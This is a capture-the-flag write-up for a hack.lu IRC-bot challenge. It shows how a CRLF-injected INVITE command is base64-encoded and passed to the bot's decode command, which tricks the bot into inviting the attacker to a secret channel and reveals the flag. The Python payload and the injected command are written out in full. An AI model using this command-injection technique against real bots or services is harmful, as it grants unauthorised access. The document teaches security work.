There's a fun and quirky IRC bot to play with. It responds to commands in private chat but also in #hacklu-saloon on freenode. We think it's involved in a devious scheme that distracts people to get their money pickpocketed. So be careful!
We deal with IRC-bot named barmixer-bot in this task. It can understand some commands that starts with "!" symbol.
Let our username is "hacker". First let's ask bot for help:
hacker: !help barmixer-bot: Send messages to the bot or the channel starting with an exclamation mark. Known commands are list, status, karma, math, base64, base64d, rot13, ping, hack, request, list
So what status is it?
hacker: !status barmixer-bot: My name is barmixer-bot, my uptime is 1 hours 55 minutes and 37 seconds. I am on the following channels: #hacklu-saloon, #hacklu-secret-channel, ...
It looks like bot is member of #hacklu-secret-channel which most likely contain a flag. But this channel require an invitation to get access.
Other commands are not very interesting. Some of them bot performs an actions such as base64 decoding / enciding, rot13. Example:
hacker: !base64 hello barmixer-bot: aGVsbG8= hacker: !base64d aGVsbG8= barmixer-bot: hello
We know about IRC-commands and specifically about INVITE command. Maybe we can force bot to invite us to secret channel?
Delimeter between IRC-commands is newline so let's generate our shell:
>>> import base64 >>> c = '1\r\nINVITE hacker #hacklu-secret-channel' >>> print base64.b64encode(c) MQ0KSU5WSVRFIGhhY2tlciAjaGFja2x1LXNlY3JldC1jaGFubmVs
And let bot decode it for us:
hacker: !base64d MQ0KSU5WSVRFIGhhY2tlciAjaGFja2x1LXNlY3JldC1jaGFubmVs
Now go to #hacklu-secret-channel and voila! We are inside! Channel topic was "FLAG: GfeBNmN5XjwDvQB64qoqaEEeYogk4rGH3ikZ0qtc3B3HKLDoAH".